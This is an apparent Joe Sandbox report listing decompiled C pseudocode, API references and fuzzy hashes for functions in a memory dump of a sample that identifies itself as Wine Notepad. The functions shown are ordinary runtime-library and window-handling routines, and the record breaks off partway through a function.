                                                  0x00000000
                                                  0x010a3700
                                                  0x010a36d5
                                                  0x010a365a
                                                  0x010a365d
                                                  0x010a3660
                                                  0x010a3662
                                                  0x00000000
                                                  0x00000000
                                                  0x010a3664
                                                  0x00000000
                                                  0x00000000
                                                  0x010a366a
                                                  0x010a366c
                                                  0x010a366e
                                                  0x010a3670
                                                  0x010a3670
                                                  0x010a3673
                                                  0x010a3676
                                                  0x010a3678
                                                  0x00000000
                                                  0x010a367e
                                                  0x010a3685
                                                  0x010a368a
                                                  0x010a368d
                                                  0x010a3690
                                                  0x010a3693
                                                  0x010a3695
                                                  0x00000000
                                                  0x010a3695
                                                  0x010a372c
                                                  0x010a372c
                                                  0x010a372c
                                                  0x00000000
                                                  0x010a3651
                                                  0x010a364b
                                                  0x010a361d
                                                  0x010a3600
                                                  0x010a3603
                                                  0x010a3605
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a3605
                                                  0x010a35dd
                                                  0x010a35e2
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 57df0acbbff6548a20d6f5bcb7f4c7d971005498bf875257984a9e90ca1427aa
                                                  • Instruction ID: 03de53f831ed53d6c2f9db541f6c2260e8aa66c704e26a0ef70c28460fee21c8
                                                  • Opcode Fuzzy Hash: 57df0acbbff6548a20d6f5bcb7f4c7d971005498bf875257984a9e90ca1427aa
                                                  • Instruction Fuzzy Hash: 5751B470A007069BDB648FFDC8846AE7FF1BF14360F948769E9A59E2D0D771D9508B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AF09F Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E010AF09F(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x10c27c4, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10c2d90 == _t7) {
									_t9 = E010A6117();
									 *_t9 = E010A6170(GetLastError());
									goto L17;
								} else {
									if(E010A8EE3(_t7, _t31) == 0) {
										_t12 = E010A6117();
										 *_t12 = E010A6170(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E010A8EE3(_t6, _t31);
						 *((intOrPtr*)(E010A6117())) = 0xc;
						goto L12;
					} else {
						E010A8C4B(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E010AF00D(__ebx, __edx, __edi, _a8);
				}
			}









                                                  0x010af0a6
                                                  0x010af0b4
                                                  0x010af0b9
                                                  0x010af0c8
                                                  0x010af0fb
                                                  0x010af0cd
                                                  0x010af0cf
                                                  0x010af0cf
                                                  0x010af0dc
                                                  0x010af0e2
                                                  0x010af0e6
                                                  0x010af146
                                                  0x010af146
                                                  0x010af0e8
                                                  0x010af0ee
                                                  0x010af130
                                                  0x010af144
                                                  0x00000000
                                                  0x010af0f0
                                                  0x010af0f9
                                                  0x010af118
                                                  0x010af12c
                                                  0x010af112
                                                  0x010af112
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010af0f9
                                                  0x010af0ee
                                                  0x00000000
                                                  0x010af114
                                                  0x010af101
                                                  0x010af10c
                                                  0x00000000
                                                  0x010af0bb
                                                  0x010af0be
                                                  0x010af0c4
                                                  0x010af0c4
                                                  0x010af115
                                                  0x010af117
                                                  0x010af0a8
                                                  0x010af0b2
                                                  0x010af0b2

                                                  APIs
                                                  • _malloc.LIBCMT ref: 010AF0AB
                                                    • Part of subcall function 010AF00D: __FF_MSGBANNER.LIBCMT ref: 010AF024
                                                    • Part of subcall function 010AF00D: __NMSG_WRITE.LIBCMT ref: 010AF02B
                                                    • Part of subcall function 010AF00D: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,010A8CE3,00000000,00000000,00000000,00000000,?,010A891D,00000018,010BF1D8), ref: 010AF050
                                                  • _free.LIBCMT ref: 010AF0BE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AllocHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 2734353464-0
                                                  • Opcode ID: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction ID: 6acf8d7eeacd4ee94d2e70671bdddf4bf3011364256ec58441b7fbdb7462d314
                                                  • Opcode Fuzzy Hash: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction Fuzzy Hash: F011C672500217AFDB723BF4EC44ADE3BE89F12265F94466AFAC49B141DF3698408B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A14B0 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E010A14B0(WCHAR* __ecx) {
				long _v8;
				void _v264;
				int _t5;
				int _t12;
				long _t16;
				void* _t19;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
				_t19 = _t5;
				if(_t19 == 0xffffffff) {
					L4:
					return _t5 | 0xffffffff;
				} else {
					_t16 = GetFileSize(_t19, 0);
					if(_t16 != 0xffffffff) {
						_t10 =  <  ? _t16 : 0xff;
						_t12 = ReadFile(_t19,  &_v264,  <  ? _t16 : 0xff,  &_v8, 0);
						_push(_t19);
						if(_t12 == 0) {
							goto L3;
						} else {
							CloseHandle();
							return E010A10E0( &_v264, _v8);
						}
					} else {
						_push(_t19);
						L3:
						_t5 = CloseHandle();
						goto L4;
					}
				}
			}









                                                  0x010a14cd
                                                  0x010a14d3
                                                  0x010a14d8
                                                  0x010a14f1
                                                  0x010a14f8
                                                  0x010a14da
                                                  0x010a14e3
                                                  0x010a14e8
                                                  0x010a1506
                                                  0x010a1512
                                                  0x010a1518
                                                  0x010a151b
                                                  0x00000000
                                                  0x010a151d
                                                  0x010a151d
                                                  0x010a1535
                                                  0x010a1535
                                                  0x010a14ea
                                                  0x010a14ea
                                                  0x010a14eb
                                                  0x010a14eb
                                                  0x00000000
                                                  0x010a14eb
                                                  0x010a14e8

                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14CD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14DD
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14EB
                                                  • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A1512
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A151D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateReadSize
                                                  • String ID:
                                                  • API String ID: 3664964396-0
                                                  • Opcode ID: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction ID: 23415bc35618172805f93c12e6c2346075209b962ded3917a35aff052a2fb7aa
                                                  • Opcode Fuzzy Hash: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction Fuzzy Hash: B801DF302402146BFA30A6BC9D8AFE9366C9F06720F1003A5FAD6E21C0DAB5594147A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A9569 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A9569(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10bf278);
				E010A61F0(__ebx, __edi, __esi);
				_t31 = E010A7A00();
				_t25 =  *0x10c1e64; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E010A8834(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10c16fc; // 0x10c19f8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10c19f8;
								if(__eflags != 0) {
									E010A8C4B(_t33);
								}
							}
						}
						_t20 =  *0x10c16fc; // 0x10c19f8
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10c16fc; // 0x10c19f8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E010A9605();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E010A44DD(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E010A6235(_t33);
			}









                                                  0x010a9569
                                                  0x010a9569
                                                  0x010a9569
                                                  0x010a956b
                                                  0x010a9570
                                                  0x010a957a
                                                  0x010a957c
                                                  0x010a9585
                                                  0x010a95a6
                                                  0x010a95ac
                                                  0x010a95b0
                                                  0x010a95b3
                                                  0x010a95b6
                                                  0x010a95bc
                                                  0x010a95be
                                                  0x010a95c0
                                                  0x010a95c9
                                                  0x010a95cb
                                                  0x010a95cd
                                                  0x010a95d3
                                                  0x010a95d6
                                                  0x010a95db
                                                  0x010a95d3
                                                  0x010a95cb
                                                  0x010a95dc
                                                  0x010a95e1
                                                  0x010a95e4
                                                  0x010a95ea
                                                  0x010a95ee
                                                  0x010a95ee
                                                  0x010a95f4
                                                  0x010a95fb
                                                  0x010a958d
                                                  0x010a958d
                                                  0x010a958d
                                                  0x010a9590
                                                  0x010a9592
                                                  0x010a9596
                                                  0x010a959b
                                                  0x010a95a3

                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __amsg_exit.LIBCMT ref: 010A9596
                                                  • __lock.LIBCMT ref: 010A95A6
                                                  • InterlockedDecrement.KERNEL32(?), ref: 010A95C3
                                                  • _free.LIBCMT ref: 010A95D6
                                                  • InterlockedIncrement.KERNEL32(010C19F8), ref: 010A95EE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 1231874560-0
                                                  • Opcode ID: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction ID: e865f658b2440249ad67686c148c2942c85d4372d33ca52f5e1e0c4e18141c01
                                                  • Opcode Fuzzy Hash: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction Fuzzy Hash: 1A012631B00612DFEB21AFF8D0457DE7BA0AF05B58F884149D8C467641CB386942CFD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6059 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E010B6059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;

				_push(0xc);
				_push(0x10bf540);
				E010A61F0(__ebx, __edi, __esi);
				_t35 = E010A7A00();
				_t37 = E010A8C83(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				if(_t37 != 0) {
					E010AEBF8(__ebx, __edx, _t35, _t37, __eflags);
					E010A9569(__ebx, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E010A8834(0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E010AE973( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E010B6713();
					E010A8834(0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E010B671F();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E010A6117())) = 0xc;
					_t24 = 0;
				}
				return E010A6235(_t24);
			}







                                                  0x010b6679
                                                  0x010b667b
                                                  0x010b6680
                                                  0x010b668a
                                                  0x010b6697
                                                  0x010b6699
                                                  0x010b669e
                                                  0x010b66af
                                                  0x010b66b4
                                                  0x010b66bc
                                                  0x010b66c1
                                                  0x010b66c6
                                                  0x010b66cc
                                                  0x010b66cc
                                                  0x010b66cc
                                                  0x010b66d2
                                                  0x010b66d8
                                                  0x010b66df
                                                  0x010b66e6
                                                  0x010b66ec
                                                  0x010b66f6
                                                  0x010b66fc
                                                  0x010b6703
                                                  0x010b6708
                                                  0x010b66a0
                                                  0x010b66a5
                                                  0x010b66ab
                                                  0x010b66ab
                                                  0x010b670f

                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __calloc_crt.LIBCMT ref: 010B6690
                                                    • Part of subcall function 010A8C83: __calloc_impl.LIBCMT ref: 010A8C92
                                                    • Part of subcall function 010A8C83: Sleep.KERNEL32(00000000), ref: 010A8CA9
                                                  • __lock.LIBCMT ref: 010B66C6
                                                  • ___addlocaleref.LIBCMT ref: 010B66D2
                                                  • __lock.LIBCMT ref: 010B66E6
                                                  • InterlockedIncrement.KERNEL32(?), ref: 010B66F6
                                                    • Part of subcall function 010A6117: __getptd_noexit.LIBCMT ref: 010A6117
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                  • String ID:
                                                  • API String ID: 2144732038-0
                                                  • Opcode ID: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction ID: f1a1ca0ad01216167b7d32764e817ee420cfd6bd6a40dbb747c820eb2a2bd595
                                                  • Opcode Fuzzy Hash: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction Fuzzy Hash: 23018471541702EAE720BFF4D841BDC77E0BF24B60F64821AE5D5AB2C0DF7699408B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1420 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A1420() {
				intOrPtr _t6;
				int _t7;
				void* _t8;
				void* _t9;

				_t7 = GetWindowTextLengthW( *0x10c3f2c);
				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
					L9:
					SetWindowTextW( *0x10c3f2c, 0x10bedac);
					SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
					return SetFocus( *0x10c3f2c);
				}
				_t6 =  *0x10c43b0;
				if(_t7 == 0 && _t6 == 0) {
					goto L9;
				}
				_t8 = _t7 - 2;
				if(_t8 == 0) {
					L10:
					return _t6;
				} else {
					_t9 = _t8 - 4;
					if(_t9 == 0) {
						if(_t6 != 0) {
							goto L9;
						}
						_t6 = E010A1770();
						if(_t6 != 0) {
							goto L9;
						}
						goto L10;
					} else {
						if(_t9 == 1) {
							goto L9;
						}
						return _t6;
					}
				}
			}







                                                  0x010a143c
                                                  0x010a1446
                                                  0x010a1474
                                                  0x010a147f
                                                  0x010a1494
                                                  0x00000000
                                                  0x010a14a0
                                                  0x010a1448
                                                  0x010a1450
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1457
                                                  0x010a145a
                                                  0x010a14a7
                                                  0x010a14a7
                                                  0x010a145c
                                                  0x010a145c
                                                  0x010a145f
                                                  0x010a1469
                                                  0x00000000
                                                  0x00000000
                                                  0x010a146b
                                                  0x010a1472
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1461
                                                  0x010a1462
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1465
                                                  0x010a1465
                                                  0x010a145f

                                                  APIs
                                                  • GetWindowTextLengthW.USER32(0001FF42), ref: 010A1427
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • SetWindowTextW.USER32(010BEDAC), ref: 010A147F
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1494
                                                  • SetFocus.USER32(?,?,?,?,?,?,?), ref: 010A14A0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSendTextWindow$FileFocusLengthNameSave_memsetlstrcpy
                                                  • String ID:
                                                  • API String ID: 4018755269-0
                                                  • Opcode ID: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction ID: d0d01fd0f563563de540cd7f9346493ed34abdffebda81ad61e8cb312e8b1206
                                                  • Opcode Fuzzy Hash: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction Fuzzy Hash: 58F01D365402129BFEB22BFCBD49BE53E71BB05690F958151FAC4A90A9CF7B8901CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2AA8 Relevance: 7.5, APIs: 5, Instructions: 36windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2AA8(void* __ebp, struct HACCEL__* _a16, struct tagMSG _a20, intOrPtr _a28) {

				do {
					if(IsDialogMessageW( *0x10c3f28,  &_a20) == 0 && TranslateAcceleratorW( *0x10c3f24, _a16,  &_a20) == 0) {
						TranslateMessage( &_a20);
						DispatchMessageW( &_a20);
					}
				} while (GetMessageW( &_a20, 0, 0, 0) != 0);
				return _a28;
			}



                                                  0x010a2ab0
                                                  0x010a2ac3
                                                  0x010a2ae3
                                                  0x010a2aea
                                                  0x010a2aea
                                                  0x010a2af9
                                                  0x010a2b07

                                                  APIs
                                                  • IsDialogMessageW.USER32(?), ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDialogDispatch
                                                  • String ID:
                                                  • API String ID: 3609149896-0
                                                  • Opcode ID: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction ID: 60769d02cf6f83864cc79469fbbcbb48fa8f249cc1afdab2abde353d41d93b44
                                                  • Opcode Fuzzy Hash: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction Fuzzy Hash: B7F0307220430AAFD720DF94ED84F9BB7ECFB88600F400829F6C4D2050E776D8199B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2000() {
				intOrPtr _v38;
				short _v40;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct tagPD _v72;
				intOrPtr _t22;

				E010A66E0( &_v72, 0, 0x42);
				_v68 =  *0x10c3f24;
				_v64 =  *0x10c510c;
				_v60 =  *0x10c5110;
				_v38 =  *0x10c3f20;
				_v40 = 1;
				_v72 = 0x42;
				_v52 = 0x40;
				PrintDlgW( &_v72);
				 *0x10c510c = _v64;
				_t22 = _v60;
				 *0x10c5110 = _t22;
				return _t22;
			}











                                                  0x010a200e
                                                  0x010a2018
                                                  0x010a2020
                                                  0x010a2028
                                                  0x010a2030
                                                  0x010a203b
                                                  0x010a2043
                                                  0x010a204a
                                                  0x010a2051
                                                  0x010a205a
                                                  0x010a205f
                                                  0x010a2062
                                                  0x010a206a

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Print_memset
                                                  • String ID: @$B
                                                  • API String ID: 2425697088-3873543624
                                                  • Opcode ID: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction ID: ff1438fdd0d050c47bbb1b1408779daa2084e229ac3f0463d6330bf6720396ef
                                                  • Opcode Fuzzy Hash: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction Fuzzy Hash: BF01C9B8E102089FCB50CF98E985B8DB7F4FB4C300F404126E988E7344E77AA9058F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2580 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2580() {
				short _v516;
				void* _t3;

				_t3 = LoadImageW( *0x10c3f20, 0x300, 1, 0x30, 0x30, 0x8000);
				LoadStringW( *0x10c3f20, 0x170,  &_v516, 0);
				return ShellAboutW( *0x10c3f24,  &_v516, L"Wine Notepad", _t3);
			}





                                                  0x010a25a0
                                                  0x010a25bc
                                                  0x010a25df

                                                  APIs
                                                  • LoadImageW.USER32 ref: 010A25A0
                                                  • LoadStringW.USER32(00000170,?,00000000), ref: 010A25BC
                                                  • ShellAboutW.SHELL32(?,Wine Notepad,00000000), ref: 010A25D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Load$AboutImageShellString
                                                  • String ID: Wine Notepad
                                                  • API String ID: 2733739231-3086428749
                                                  • Opcode ID: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction ID: b212f807f021e25f2be132c610dfb7e1d325a0875a9e818b18c112560ed9d484
                                                  • Opcode Fuzzy Hash: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction Fuzzy Hash: 97F03033151215BBF7315790ED8AFEA7A7CF708B10F000051B698690D4D6A729148B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1540 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E010A1540(intOrPtr __ecx) {
				intOrPtr _v32;
				intOrPtr _v40;
